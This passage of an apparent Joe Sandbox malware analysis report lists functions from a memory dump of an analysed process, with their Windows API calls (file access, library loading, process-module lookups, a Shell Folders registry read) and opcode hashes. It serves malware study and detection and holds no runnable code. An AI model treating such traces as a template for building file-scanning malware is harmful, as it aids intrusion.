                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                    • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                  • String ID:
                  • API String ID: 1481295809-0
                  • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                  • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                  Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                  • String ID:
                  • API String ID: 3150196962-0
                  • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                  • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                  • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                  • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                  Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                  Download Yara Rule
                  APIs
                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$PointerRead
                  • String ID:
                  • API String ID: 3154509469-0
                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                  Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                  Download Yara Rule
                  APIs
                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfile$StringWrite_itowmemset
                  • String ID:
                  • API String ID: 4232544981-0
                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                  Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                  Download Yara Rule
                  APIs
                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                  Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$FileModuleName
                  • String ID:
                  • API String ID: 3859505661-0
                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                  Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                  Download Yara Rule
                  APIs
                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                  Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                  Download Yara Rule
                  APIs
                  • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileWrite
                  • String ID:
                  • API String ID: 3934441357-0
                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                  Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                  Download Yara Rule
                  APIs
                  • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                  • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                  • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                  • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                  Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                  • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                  Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                  Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                  Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                  • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                  Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                  Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                  Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: EnumNamesResource
                  • String ID:
                  • API String ID: 3334572018-0
                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                  Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                  Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                  Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Open
                  • String ID:
                  • API String ID: 71445658-0
                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                  Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                  Download Yara Rule
                  APIs
                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                  Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                  • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                  • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                  • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                  Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                  • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                  • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                  • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                  Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 004095FC
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                    • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                    • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                  • String ID:
                  • API String ID: 3655998216-0
                  • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                  • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                  • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                  • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                  Function 00415B2C Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                  • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                  • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                  • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                  Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00445426
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                  • String ID:
                  • API String ID: 1828521557-0
                  • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                  • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                  • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                  • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                  Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                  • memcpy.MSVCRT ref: 00406942
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@FilePointermemcpy
                  • String ID:
                  • API String ID: 609303285-0
                  • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                  • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                  • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                  • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                  Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
